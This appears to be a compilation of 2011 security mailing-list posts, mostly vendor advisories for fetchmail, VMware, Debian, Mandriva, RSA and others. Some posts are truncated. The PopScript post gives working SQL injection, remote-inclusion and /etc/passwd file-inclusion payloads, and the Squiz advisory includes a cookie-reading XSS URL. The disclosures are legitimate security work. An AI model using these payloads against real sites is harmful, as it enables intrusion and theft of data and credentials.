fetchmail security announcement fetchmail-SA-2011-01 (CVE-2011-1947)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 fetchmail-SA-2011-01: Denial of service possible in STARTTLS mode Topics: fetchmail denial of service in STARTTLS protocol phases Author: Matthias Andree Version:1.0 Announced: 2011-06-06 Type: Unguarded blocking I/O can cause indefinite application hang Impact: Denial of service Danger: low CVE Name: CVE-2011-1947 CVSSv2: (AV:N/AC:M/Au:S/C:N/I:N/A:C/E:U/RL:O/RC:C) CVSS scores:4.7: Base 6.3 (Impact 6.9 Exploitability 6.8) Temporal 4.7 This is calculated without Environmental Score. URL:http://www.fetchmail.info/fetchmail-SA-2011-01.txt Project URL:http://www.fetchmail.info/ Affects:fetchmail releases 5.9.9 up to and including 6.3.19 Not affected: fetchmail release 6.3.20 and newer Corrected in: 2011-05-26 Git, among others, see commit 7dc67b8cf06f74aa57525279940e180c99701314 2011-05-29 fetchmail 6.3.20-rc3 tarball (for testing) 2011-06-06 fetchmail 6.3.20 release tarball 0. Release history == 2011-05-30 0.1 first draft (visible in Git and through oss-security) 2011-06-06 1.0 release 1. Background = fetchmail is a software package to retrieve mail from remote POP3, IMAP, ETRN or ODMR servers and forward it to local SMTP, LMTP servers or message delivery agents. fetchmail supports SSL and TLS security layers through the OpenSSL library, if enabled at compile time and if also enabled at run time, in both SSL/TLS-wrapped mode on dedicated ports as well as in-band-negotiated STARTTLS and STLS modes through the regular protocol ports. 2. Problem description and Impact = Fetchmail version 5.9.9 introduced STLS support for POP3, version 6.0.0 added STARTTLS for IMAP. However, the actual S(TART)TLS-initiated in-band SSL/TLS negotiation was not guarded by a timeout. Depending on the operating system defaults as to TCP stream keepalive mode, fetchmail hangs in excess of one week after sending STARTTLS were observed if the connection failed without notifying the operating system, for instance, through network outages or hard server crashes. A malicious server that does not respond, at the network level, after acknowledging fetchmail's STARTTLS or STLS request, can hold fetchmail in this protocol state, and thus render fetchmail unable to complete the poll, or proceed to the next server, effecting a denial of service. SSL-wrapped mode on dedicated ports was unaffected by this problem, so can be used as a workaround. 3. Solution === Install fetchmail 6.3.20 or newer. The fetchmail source code is always available from http://developer.berlios.de/project/showfiles.php?group_id=1824. Distributors are encouraged to review the NEWS file and move forward to 6.3.20, rather than backport individual security fixes, because doing so routinely misses other fixes crucial to fetchmail's proper operation, for which no security announcements are issued. Several such (long-standing) bugs were fixed through recent releases, and an erratum notice for SASL authentication was issued. Fetchmail 6.3.X releases have always been made with a focus on unchanged user and program interfaces so as to avoid disruptions when upgrading from 6.3.X to 6.3.Y with Y X. Care was taken to not change the interface incompatibly. 4. Workaround = If supported by the server's configuration, fetchmail can be run in ssl-wrapped rather than starttls mode. To that extent, the ssl sslproto ssl3 option must be configured (possibly replacing sslproto tls1 where configured) to the rcfile, or --ssl --sslproto ssl3 can be given on the command line (where it applies to all poll configurations). It is generally also advisable to enforce SSL certificate validation, by either using --sslcertck on the command line, or using sslcertck in a default configuration entry of the rcfile, or using sslcertck in each of the relevant individual poll descriptions of the rcfile. A. Copyright, License and Non-Warranty == (C) Copyright 2011 by Matthias Andree, matthias.and...@gmx.de. Some rights reserved. This work is licensed under the Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 Germany License. To view a copy of this license, visit http://creativecommons.org/licenses/by-nc-nd/3.0/de/ or send a letter to Creative Commons 171 Second Street Suite 300 SAN FRANCISCO, CALIFORNIA 94105 USA THIS WORK IS PROVIDED FREE OF CHARGE AND WITHOUT ANY WARRANTIES. Use the information herein at your own risk. END of fetchmail-SA-2011-01 -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.16 (GNU/Linux) iEYEARECAAYFAk3swwUACgkQvmGDOQUufZWaBACdHHSAiQZ5OIOur3vflKbzbIi2 WbkAni+ROgf+9IU1rE0j8RJKvzZrJfIP =d/Bl -END PGP SIGNATURE-
iDefense Security Advisory 05.03.11: Tom Sawyer GET Extension Factory COM Object Instantiation Memory Corruption Vulnerability
iDefense Security Advisory 05.03.11 http://labs.idefense.com/intelligence/vulnerabilities/ May 03, 2011 I. BACKGROUND Tom Sawyer Software's GET Extension Factory is a component used for graph visualization applications development. It is included in VMWare Infrastructure Client. For more information, please visit vendor's website: http://www.tomsawyer.com/products/index.php II. DESCRIPTION Remote exploitation of a memory corruption vulnerability in Tom Sawyer Software's GET Extension Factory could allow an attacker to execute arbitrary code with the privileges of the affected user. The vulnerability exists within the way that Internet Explorer instantiates GET Extension Factory COM objects, which is not intended to be created inside of the browser. The object does not initialize properly, and this leads to a memory corruption vulnerability that an attacker can exploit to execute arbitrary code. III. ANALYSIS Exploitation of this vulnerability would allow an attacker to execute arbitrary code with the privileges of the affected user. In order to exploit this vulnerability, an attacker would have to convince the target to visit a website. An attacker typically accomplishes this via social engineering or injecting content into compromised, trusted sites. IV. DETECTION iDefense has confirmed Tom Sawyer's Default GET Extension Factory 5.5.2.237, tsgetxu71ex552.dll and tsgetx71ex552.dll to be vulnerable. VMWare VirtualCenter 2.5 Update 6, VirtualCenter 2.5 Update 6a is vulnerable. V. WORKAROUND Setting the kill bit for those controls will prevent exploitation. The CLSIDs for the controls are A2282403-50DE-4A2E-A118-B90AEDB1ADCC and 575B655F-FED4-4EE1-8F62-0A69D404F46B VI. VENDOR RESPONSE VMware Inc. has released patches to address this issue. Information about downloadable vendor updates can be found by clicking on the URLs shown. http://www.vmware.com/security/advisories/VMSA-2011-0009.html VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2011-2217 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 11/11/2008 Initial Vendor Notification 11/11/2008 Initial Vendor Reply 05/03/2011 Coordinated Public Disclosure IX. CREDIT This vulnerability was reported to iDefense by Elazar Broad. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2011 Verisign Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerserv...@idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
VMware Tools Multiple Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 VSR Security Advisory http://www.vsecurity.com/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: VMware Tools Multiple Vulnerabilities Release Date: 2011-06-03 Application: VMware Guest Tools Severity: High Author: Dan Rosenberg drosenberg (at) vsecurity.com Vendor Status: Patch Released [2] CVE Candidate: CVE-2011-1787, CVE-2011-2145, CVE-2011-2146 Reference: http://www.vsecurity.com/resources/advisory/20110603-1/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description - --- - From [1]: VMware Tools is a suite of utilities that enhances the performance of the virtual machine's guest operating system and improves management of the virtual machine. Without VMware Tools installed in your guest operating system, guest performance lacks important functionality. Vulnerability Overview - -- On February 17th, VSR identified multiple vulnerabilities in VMware Tools, a suite of utilities shipped by VMware with multiple product offerings, as well as by open-source distributions as the open-vm-tools package. The first of these issues results in a minor information disclosure vulnerability, while the second two issues may result in privilege escalation in a VMware guest with VMware Tools installed. Product Background - -- VMware Tools includes mount.vmhgfs, a setuid-root utility that allows unprivileged users in a guest VM to mount HGFS shared folders. Also shipped with VMware Tools is vmware-user-suid-wrapper, a setuid-root utility which handles initial setup to prepare for running vmware-user, which grants users access to other utilities included with VMware Tools. Vulnerability Details - - CVE-2011-2146: The mount.vmhgfs utility makes a call to stat() to check for the existence and type (file, directory, etc.) of the user-supplied mountpoint, and provides an error message if the provided argument does not exist or is not a directory. Because mount.vmhgfs is setuid-root, a local attacker can leverage this behavior to identify if a given path exists in the guest operating system and whether it is a file or directory, potentially violating directory permissions. CVE-2011-1787: The mount.vmhgfs utility checks that the user-provided mountpoint is owned by the user attempting to mount an HGFS share prior to performing the mount. However, a race condition exists between the time this checking is performed and when the mount is performed. Successful exploitation allows a local attacker to mount HGFS shares over arbitrary, potentially root-owned directories, subsequently allowing privilege escalation within the guest. CVE-2011-2145: The vmware-user-suid-wrapper utility attempts to create a directory at /tmp/VMwareDnD. Next, it makes calls to chown() and chmod() to make this directory root-owned and world-writable. By placing a symbolic link at the location of this directory, vmware-user-suid-wrapper will cause the symbolic link target to become world-writable, allowing local attackers to escalate privileges within the guest. Only FreeBSD and Solaris versions of VMware Tools are affected. Versions Affected - - VMware's advisory [2] indicates the following product versions are affected: VMware Product Running Replace with/ Product Version on Apply Patch = === = vCenter any Windows not affected Workstation 7.1.x Linux 7.1.4 or later* Workstation 7.1.x Windows 7.1.4 or later* Player 3.1.x Linux 3.1.4 or later* Player 3.1.x Windows 3.1.4 or later* AMS any any not affected Fusion 3.1.x OSX Fusion 3.1.3 or later* ESXi4.1 ESXiESXi410-201104402-BG* ESXi4.0 ESXiESXi400-201104402-BG* ESXi3.5 ESXiESXe350-201105402-T-SG* ESX 4.1 ESX ESX410-201104401-SG* ESX 4.0 ESX ESX400-201104401-SG* ESX 3.5 ESX ESX350-201105406-SG* ESX 3.0.3 ESX not affected The open-vm-tools package prior to version 2011.02.23-368700 is also affected. Vendor Response - --- The following timeline details VMware's response to the reported issue: 2011-02-17VMware receives initial vulnerability report 2011-02-17VMware security team acknowledges receipt 2011-03-04VMware provides status update 2011-03-04VSR initiates discussion of disclosure date 2011-03-10VMware responds, indicates internal coordination underway 2011-03-11VSR
[SECURITY] [DSA 2253-1] fontforge security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2253-1 secur...@debian.org http://www.debian.org/security/ Thijs Kinkhorst June 3, 2011 http://www.debian.org/security/faq - - Package: fontforge Vulnerability : buffer overflow Problem type : remote Debian-specific: no CVE ID : CVE-2010-4259 Debian Bug : 605537 Ulrik Persson reported a stack-based buffer overflow flaw in FontForge, a font editor. When processed a crafted Bitmap Distribution Format (BDF) FontForge could crash or execute arbitrary code with the privileges of the user running FontForge. For the oldstable distribution (lenny), this problem has been fixed in version 0.0.20080429-1+lenny2. For the stable distribution (squeeze), testing distribution (wheezy), and unstable distribution (sid) are not affected by this problem. We recommend that you upgrade your fontforge packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iQEcBAEBAgAGBQJN6TbqAAoJEOxfUAG2iX57sXUH/jq43XDXkz8o03rw2Xm7kvnX VGIrbvo3RGEZ2Pg2fNSIGx1F4MeuMrwA5+dm46mGqYzHvV54+aexIvY1b8bLJ/B3 YmNw0iQa5SSS4zFW+4vDAc5+UI/NqL6EsStdlELdBW0cXNaIUofxCnFl9SUuWb7z D9Btrc09mfYs44VrarYm1YaOTT9NexIQzadvaLAHOwRuAR6mK3YrKcQhuR2Hblz6 ObMXTHaGpmHXCQx9nRPMDr2I/oA0ipiu7N9wzELs/Z2eiKda2Xhq0t+CqRjIOH5c r0GAxZxHOlqwfBh3ouPlBaTLlltvHN7jsLG6Ojf1f/S6D88mkpIi88Mkj4wElNo= =bA8W -END PGP SIGNATURE-
AppSec USA 2011 CFP Reminder, CTF Pre-Conference Challenge #2
Hello netizens! This is an update about the OWASP AppSec USA 2011 software security conference in Minneapolis this September. *** CALL FOR PAPERS *** Have something important to say about software security? The OWASP AppSec USA 2011 Call for Papers is still open. We're looking for hardcore talks in cloud security, mobile security, new attacks defenses, and straight up software development platforms. Get your submission in before time runs out. And have your developer friends submit a talk! http://www.appsecusa.org/talks.html The AppSec USA 2011 talks will be delivered September 22-23, 2011 in Minneapolis, Minnesota. In addition to the talks, we'll have excellent keynotes like Moxie Marlinspike. *** CAPTURE THE FLAG PRE-CONFERENCE CHALLENGE #2 *** Last month ChrisKarel won pre-conference challenge #1 for a pass to the OWASP AppSec USA 2011 talks. Congratulations, ChrisKarel! For June, we're back with another chance for you to score a free conference pass and get a feel for the AppSec USA 2011 CTF challenges coming this September. Good luck. http://www.appsecusa.org/ctf.html *** TRAINING *** We have awesome training at a fair price. Register for mobile security, penetration testing, secure coding, and attack detection and response courses being held September 20-21. Hurry before classes fill up. http://www.appsecusa.org/training.html *** MORE APPSEC USA 2011 *** Check out www.appsecusa.org for other events including a 5K / 10K charity run, the first ever Women in AppSec grant, and a chance to have your own original music played at the conference. Thanks to our wonderful supporters - check them out at www.appsecusa.org! -- Adam Baso OWASP AppSec USA 2011: Your life is in the cloud. September 20-23 Training, Talks, CTF, Showroom, and More www.appsecusa.org @appsecusa
[ MDVSA-2011:106 ] subversion
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2011:106 http://www.mandriva.com/security/ ___ Package : subversion Date: June 4, 2011 Affected: 2009.0, 2010.1, Corporate 4.0, Enterprise Server 5.0 ___ Problem Description: Multiple vulnerabilities were discovered and corrected in subversion: The mod_dav_svn Apache HTTPD server module will dereference a NULL pointer if asked to deliver baselined WebDAV resources which can lead to a DoS (Denial Of Service) (CVE-2011-1752). The mod_dav_svn Apache HTTPD server module may in certain cenarios enter a logic loop which does not exit and which allocates emory in each iteration, ultimately exhausting all the available emory on the server which can lead to a DoS (Denial Of Service) (CVE-2011-1783). The mod_dav_svn Apache HTTPD server module may leak to remote users the file contents of files configured to be unreadable by those users (CVE-2011-1921). Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149amp;products_id=490 The updated packages have been upgraded to the 1.6.17 version which is not vulnerable to these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1752 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1783 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1921 http://svn.apache.org/repos/asf/subversion/tags/1.6.17/CHANGES ___ Updated Packages: Mandriva Linux 2009.0: b7dcf908858e788c0321e13109163494 2009.0/i586/apache-mod_dav_svn-1.6.17-0.1mdv2009.0.i586.rpm c403bbd6aedcd9426dc5cf72ef56d1a9 2009.0/i586/apache-mod_dontdothat-1.6.17-0.1mdv2009.0.i586.rpm 2f3d2373aed96710023c6a84819731f6 2009.0/i586/libsvn0-1.6.17-0.1mdv2009.0.i586.rpm 2b4a273ce742b44b5a18bfaba5b9e6af 2009.0/i586/libsvnjavahl1-1.6.17-0.1mdv2009.0.i586.rpm e11fb3f919ab6358d3a3ac26d803715f 2009.0/i586/perl-SVN-1.6.17-0.1mdv2009.0.i586.rpm 745a88c6044f3cf2fda88bfc80500c1a 2009.0/i586/python-svn-1.6.17-0.1mdv2009.0.i586.rpm 7baab70f65cac6de36cede330f032cc5 2009.0/i586/ruby-svn-1.6.17-0.1mdv2009.0.i586.rpm c15bd5f296328d65f2612a61238b0f01 2009.0/i586/subversion-1.6.17-0.1mdv2009.0.i586.rpm b6c69f4a93490250bc4c1c29a51d0301 2009.0/i586/subversion-devel-1.6.17-0.1mdv2009.0.i586.rpm 6b780c034fcf7caa146ac495f74776fd 2009.0/i586/subversion-doc-1.6.17-0.1mdv2009.0.i586.rpm 51e8efe6c17057098eec1e9b0d9b305e 2009.0/i586/subversion-server-1.6.17-0.1mdv2009.0.i586.rpm f974ca62b90d4db1f3eeb0dc80a06787 2009.0/i586/subversion-tools-1.6.17-0.1mdv2009.0.i586.rpm 804da077e30821641755625cb9f6f545 2009.0/i586/svn-javahl-1.6.17-0.1mdv2009.0.i586.rpm 9ac126adb88c745c67e55630c98f1dff 2009.0/SRPMS/subversion-1.6.17-0.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: adf776406f42c9bb4c5928f8d16ad74f 2009.0/x86_64/apache-mod_dav_svn-1.6.17-0.1mdv2009.0.x86_64.rpm f35384b836889e04b9d732045deacccb 2009.0/x86_64/apache-mod_dontdothat-1.6.17-0.1mdv2009.0.x86_64.rpm cff7dcefaf6e8c3d0a7642a36661e803 2009.0/x86_64/lib64svn0-1.6.17-0.1mdv2009.0.x86_64.rpm 01019c76de0636f512bc1338a180ab1b 2009.0/x86_64/lib64svnjavahl1-1.6.17-0.1mdv2009.0.x86_64.rpm 74812d1b64db5301b1ed74db46dc08b6 2009.0/x86_64/perl-SVN-1.6.17-0.1mdv2009.0.x86_64.rpm 59e84aa6043fae46047327ac124771e9 2009.0/x86_64/python-svn-1.6.17-0.1mdv2009.0.x86_64.rpm 15fae543266ede69fa220419ca91bc8f 2009.0/x86_64/ruby-svn-1.6.17-0.1mdv2009.0.x86_64.rpm cd9be5e2b3ba9497e7f8e42a8d0181e0 2009.0/x86_64/subversion-1.6.17-0.1mdv2009.0.x86_64.rpm 8e14979cf0ac190035fcb0ae994fe4d8 2009.0/x86_64/subversion-devel-1.6.17-0.1mdv2009.0.x86_64.rpm 4c2e1922b12202697983b567638c9b92 2009.0/x86_64/subversion-doc-1.6.17-0.1mdv2009.0.x86_64.rpm a7e5997dc660568bafed59a7bab37578 2009.0/x86_64/subversion-server-1.6.17-0.1mdv2009.0.x86_64.rpm 936dc2d30cc5bb8f54b32d862af63f3d 2009.0/x86_64/subversion-tools-1.6.17-0.1mdv2009.0.x86_64.rpm e40d82e0b13a180d2a3c2ed2cd356e52 2009.0/x86_64/svn-javahl-1.6.17-0.1mdv2009.0.x86_64.rpm 9ac126adb88c745c67e55630c98f1dff 2009.0/SRPMS/subversion-1.6.17-0.1mdv2009.0.src.rpm Mandriva Linux 2010.1: 809c8316c0cf26a1aa7a26260ebd556b 2010.1/i586/apache-mod_dav_svn-1.6.17-0.1mdv2010.2.i586.rpm 1c5aa3316d62eb40cbda3e91b5a0dead 2010.1/i586/apache-mod_dontdothat-1.6.17-0.1mdv2010.2.i586.rpm 680745e35e66433826514dc65f748597 2010.1/i586/libsvn0-1.6.17-0.1mdv2010.2.i586.rpm 2e523e3262c4fa0d918f6667c8c00bf1 2010.1/i586/libsvn-gnome-keyring0-1.6.17-0.1mdv2010.2.i586.rpm
[SECURITY] [DSA 2254-1] oprofile security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - --- Debian Security Advisory DSA 2254-1 secur...@debian.org http://www.debian.org/security/ Luciano Bello June 3, 2011 http://www.debian.org/security/faq - --- Package: oprofile Vulnerability : command injection Problem type : local Debian-specific: no Debian bug : 624212 CVE ID : CVE-2011-1760 OProfile is a performance profiling tool which is configurable by opcontrol, its control utility. Stephane Chauveau reported several ways to inject arbitrary commands in the arguments of this utility. If a local unprivileged user is authorized by sudoers file to run opcontrol as root, this user could use the flaw to escalate his privileges. For the oldstable distribution (lenny), this problem has been fixed in version 0.9.3-2+lenny1. For the stable distribution (squeeze), this problem has been fixed in version 0.9.6-1.1+squeeze1. For the testing distribution (wheezy), this problem has been fixed in version 0.9.6-1.2. For the unstable distribution (sid), this problem has been fixed in version 0.9.6-1.2. We recommend that you upgrade your oprofile packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk3qdL0ACgkQHYflSXNkfP/FlACeJhDQcRMuQHvWHa25HnSdMECy T90An1FejDYdiCPVthcunO2YytGOzc6e =Weyj -END PGP SIGNATURE-
PopScript Multiple Vulnerabilities
## # Exploit Title: PopScript Multiple Vulnerabilities # home : http://www.D99Y.com # Google Dork: Do as you would be done by ; ) # Date: 5/6/2011 # Author: NassRawI # Software Link: http://www.popscript.com/ ## # # [1] SQL injection # # http://localhost/PopScript/index.php?act=inboxmode=1 [ SQL injection ] # # [2] File inclusion = require() # # Remote File inclusion : # # exploit : # # send in index.php [ post ] # # email=r...@d99y.commode=[Shell txt]?password=nassrawiremember=ON # # Local : # # exploit : # # send in index.php [ post ] # # email=r...@d99y.commode=nassrawi../../../../../../etc/passwdpassword=nassrawi # # You can skip protection include_path ; ) # # email=r...@d99y.commode=nassrawi../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ ././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././. /./././././././././././././././././././././././././././././.! /./././. /././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././. /././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ ././././././././././././././././././././././././././././././! ././././ ./././././.password=nassrawi # # ##
Squiz Matrix - Cross-Site Scripting Vulnerability
Squiz Matrix - Cross-Site Scripting Vulnerability http://www.osisecurity.com.au/advisories/squiz-matrix-cross-site-scripting Release Date: 06-Jun-2011 Software: Squiz - Matrix http://www.squiz.net/ Squiz Matrix delivers highly flexible and robust business integration engine and application development tools. It is an evolution, and the latest release, of the very successful MySource Matrix content management system. Versions tested / affected: Squiz Matrix 4.0.6 / 4.2.2 and prior. Vulnerability discovered: Cross-site Scripting Vulnerability impact: Low - Remote content may contain JavaScript which is client executed. May be used to steal authentication information etc. Vulnerability information: The remote page may contain JavaScript for XSS purposes, e.g. cookies. The parameter is correctly filtered by using htmlentities, however the filtered input is echoed within a script statement allowing for javascript injection providing the logic is complete. Example: http://[target]/__lib/html_form/colour_picker.php?colour=';%20alert(document.cookie);%20var%20x='pickerid=00 Patched scripts include insert_dfn.php, insert_link.php, spell_checker_popup.php, colour_picker.php and tag_suggestion.php. Recommendation: Upgrade to version 4.0.7 or 4.2.3. Workaround: N/A. Credit: This vulnerability was discovered by Patrick Webster. Disclosure timeline: 01-Jun-2011 - Discovered during audit. 02-Jun-2011 - Notified vendor. Vendor response. 03-Jun-2011 - Vendor patched in CVS repository. 06-Jun-2011 - Vendor announces release of v4.0.7 4.2.3. 06-Jun-2011 - Disclosure. We'd like to thank Squiz for their exceptional response time in responding to, and addressing, these issues. About OSI Security: OSI Security is an independent network and computer security auditing and consulting company based in Sydney, Australia. We provide internal and external penetration testing, vulnerability auditing and wireless site audits, vendor product assessments, secure network design, forensics and risk mitigation services. We can be found at http://www.osisecurity.com.au/
ESA-2011-009 (revised): RSA, The Security Division of EMC, announces new fix for potential security vulnerability in RSA(r) Access Manager Server.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ESA-2011-009 (revised): RSA, The Security Division of EMC, announces new fix for potential security vulnerability in RSA® Access Manager Server. Advisories Updated June 2, 2011 Summary: RSA Access Manager Server has been updated with the resolution to a regression error found with the security patch previously released on March 10th, 2011. For additional details on the original issue refer to: https://knowledge.rsasecurity.com/scolcms/set.aspx?id=8854 CVE Identifier: CVE-2011-0322 Description: RSA Access Manager Server contains a potential vulnerability due to improper input handling that could be exploited by malicious people to gain unauthorized access to protected resources. Affected Products: RSA Access Manager Server version 5.5.x RSA Access Manager Server version 6.0.x RSA Access Manager Server version 6.1.x Recommendation: RSA strongly recommends that all customers running RSA Access Manager Server versions 5.5.3, 6.0.4, and 6.1 apply the following updated security hot fixes, which contain the resolution to this issue, at the earliest opportunity. The hot fixes can be downloaded from SecurCare Online or by contacting RSA Security Customer Support. Security Hot fix # 5.5.3.174 for RSA Access Manager Server version 5.5.3 Security Hot fix # 6.0.4.60 for RSA Access Manager Server version 6.0.4 Security Hot fix # 6.1.2.08 for RSA Access Manager Server version 6.1.2 Security Hot fix # 6.1.3.05 for RSA Access Manager Server version 6.1.3 The security hot fixes for RSA Access Manager Server are available immediately and are designed to address this potential issue. As of the date of this RSA SecurCare® Online Security Advisory, RSA is not aware of any security breaches that have occurred as a result of this vulnerability. Common Vulnerability Scoring System (CVSS) Base Score: The Common Vulnerability Scoring System (CVSS) base score for the items identified in this advisory is 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P). RSA recommends that all customers take into account both the base score and any relevant temporal and environmental scores, which may impact the potential severity associated with a particular security vulnerability. For more information on CVSS scoring, please see the Knowledge Base Article, Security Advisories Severity Rating at https://knowledge.rsasecurity.com/scolcms/knowledge.aspx?solution=a46604. Obtaining Downloads: To obtain the latest RSA product downloads, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com and click Products in the top navigation menu. Select the specific product whose download you want to obtain. Scroll to the section for the product download that you want and click on the link. Obtaining Documentation: To obtain RSA documentation, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com and click Products in the top navigation menu. Select the specific product whose documentation you want to obtain. Scroll to the section for the product version that you want and click the set link. Obtaining More Information: For more information about RSA Access Manager, visit the RSA web site at http://www.rsa.com/node.aspx?id=1186. Getting Support and Service: For customers with current maintenance contracts, contact your local RSA Customer Support center with any additional questions regarding this RSA SecurCare Note. For contact telephone numbers or e-mail addresses, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com, click Help Contact, and then click the Contact Us - Phone tab or the Contact Us - Email tab. General Customer Support Information: http://www.rsa.com/node.aspx?id=1264 RSA SecurCare Online: https://knowledge.rsasecurity.com EOPS Policy: RSA has a defined End of Primary Support policy associated with all major versions. Please refer to the link below for additional details. http://www.rsa.com/node.aspx?id=2575 SecurCare Online Security Advisories RSA, The Security Division of EMC, distributes SCOL Security Advisories in order to bring to the attention of users of the affected RSA products important security information. RSA recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided as is without warranty of any kind. RSA disclaim all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event shall RSA or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if RSA or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
[SECURITY] [DSA 2255-1] libxml2 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2255-1 secur...@debian.org http://www.debian.org/security/ Thijs Kinkhorst June 6, 2011 http://www.debian.org/security/faq - - Package: libxml2 Vulnerability : buffer overflow Problem type : local (remote) Debian-specific: no Debian Bug : 628537 Chris Evans discovered that libxml was vulnerable to buffer overflows, which allowed a crafted XML input file to potentially execute arbitrary code. For the oldstable distribution (lenny), this problem has been fixed in version 2.6.32.dfsg-5+lenny4. For the stable distribution (squeeze), this problem has been fixed in version 2.7.8.dfsg-2+squeeze1. For the unstable distribution (sid), this problem has been fixed in version 2.7.8.dfsg-3. We recommend that you upgrade your libxml2 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iQEcBAEBAgAGBQJN7QwPAAoJEOxfUAG2iX57YJAH/josuE57GS1ccWBCgGPy6iZB v1fYpvcstvnjOlkMtWzgnrSZVoDm6VLuaIabAzIZ/sXvrcWvC+pXsu73KsksTf2N ryEbEWdeb/uuEMbcDewzUl5Ywix2amHrwIBvH0VV/tgQax3gHAtr8sg3H649NC/X rI4qu+TzTMPKQpXxvnvZt1A65kaIQMKQ5vkY3S4Ol0QmbohVsOcbZDR86/8FWhLN qwG1+gm6CKWwHzXDNJMaWlou3vOPipiX958rkrrHk3xVHg9H/cEZ+LP/bv3OEzPn Bob54WQjQZoXwgWmQdEba667HqvrICxdsUER6A5rG3BQnCNeUzuYd64yBVuYYsQ= =TfN+ -END PGP SIGNATURE-
Java HotSpot Cryptographic Provider signature verification vulnerability
